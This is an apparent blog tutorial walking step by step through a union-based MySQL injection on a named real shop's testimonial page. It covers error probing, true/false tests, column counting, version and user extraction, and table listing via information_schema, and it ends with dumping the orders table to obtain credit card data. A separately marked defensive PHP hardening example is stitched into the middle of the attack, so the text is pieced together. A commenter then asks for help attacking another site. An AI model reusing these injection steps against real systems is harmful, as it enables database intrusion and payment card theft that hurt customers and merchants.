Wednesday, March 23, 2011

TUT hack shop php mysql injection 5.0

victim: https://www.185elgin.com/customer_te...timonial_id=25'


Quote:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

select * FROM customer_testimonials WHERE testimonials_id = 25\' 
To tell whether this error can actually be exploited, we query a little further to check:

https://www.185elgin.com/customer_te...timonial_id=25 and 1=1/*

This returns a page for the true condition (1).

https://www.185elgin.com/customer_te...timonial_id=25 and 1=0/*

This returns a page for the false condition (0).
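Why the two pages differ, and the fix, as an added example (not code from the original post or from the shop): the echoed statement suggests the value of `testimonial_id` is concatenated into the SQL text, so the first function reproduces that assumed pattern and the second validates and binds the value. The function names, the `body` column, the sample row and the use of in-memory SQLite in place of MySQL are assumptions so that it runs offline.

```php
<?php
// Added example. Constructed data; in-memory SQLite stands in for the page's MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE customer_testimonials (testimonials_id INTEGER PRIMARY KEY, body TEXT)');
$pdo->exec("INSERT INTO customer_testimonials VALUES (25, 'constructed sample row')");

// Assumed vulnerable pattern: the request value is pasted into the SQL text,
// so the database parses it as SQL rather than treating it as data.
function find_vulnerable(PDO $pdo, string $raw): array {
    $sql = "SELECT * FROM customer_testimonials WHERE testimonials_id = $raw";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: accept only a positive integer, then bind it as a parameter.
function find_hardened(PDO $pdo, string $raw): ?array {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller answers 400/404; nothing reaches the database
    }
    $stmt = $pdo->prepare('SELECT * FROM customer_testimonials WHERE testimonials_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Inputs taken from the page: a plain id, the two boolean conditions
// (without the trailing comment marker), and the stray quote.
foreach (['25', '25 and 1=1', '25 and 1=0', "25'"] as $raw) {
    try {
        $v = count(find_vulnerable($pdo, $raw)) . ' row(s)';
    } catch (PDOException $e) {
        // Log server-side only; echoing the driver message and the query to
        // the client is what exposed the statement quoted on this page.
        error_log($e->getMessage());
        $v = 'generic error page';
    }
    $h = find_hardened($pdo, $raw);
    printf("%-12s vulnerable: %-20s hardened: %s\n", $raw, $v,
        $h === null ? 'rejected' : count($h) . ' row(s)');
}
```

With the concatenated query the appended condition changes the row count; with validation and binding every non-integer value is rejected before any SQL runs.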

If both conditions above hold, go ahead and hack the site.


Now we find out how many columns this site has so that the bug can be exploited.




https://www.185elgin.com/customer_te...,3,4,5,6,7,8--

Querying with 1-8 produces this output:

Quote:

Positions 3 and 6 show up; we take position 3.
3

6
Use position 3 as the anchor point, as below!

Now we find out which MySQL version this site runs so the exploitation can be adapted to it.

We should use the function concat_ws(0x3a,version(),user(),database()) to find it.

https://www.185elgin.com/customer_te...)),4,5,6,7,8--

So the MySQL version is 5.0.xx


Quote:

5.0.51a-community:sendmc2_script@localhost:sendmc2_185elgin

At this point we can exploit it the MySQL 5.0 injection way.


Let's find the site's first table.

https://www.185elgin.com/customer_te...0limit%201,1--



Quote:

The first table returned is: COLLATIONS
A small tip for testers too lazy to query the tables one at a time; do it like this:


https://www.185elgin.com/customer_te...chema.tables--


So now we have the first table and the other tables of the site.

Now we look for the table that contains the cc :d

Let's query the orders table to get all the cc.

First it has to be converted to hex.

We go to http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
and convert orders to this: 0x6F7264657273

https://www.185elgin.com/customer_te...0x6F7264657273


Quote:

orders_id
customers_id
customers_name
...

Done. Now we take the info needed to get the cc.

https://www.185elgin.com/customer_te...+from+orders--




1 comment:

Anonymous said...

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-5.0.41-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

/shop/shopdisplayproducts.asp, line 171

I need your help with this error; I can't find the tables for this error. Is this a MySQL 5.0 error?
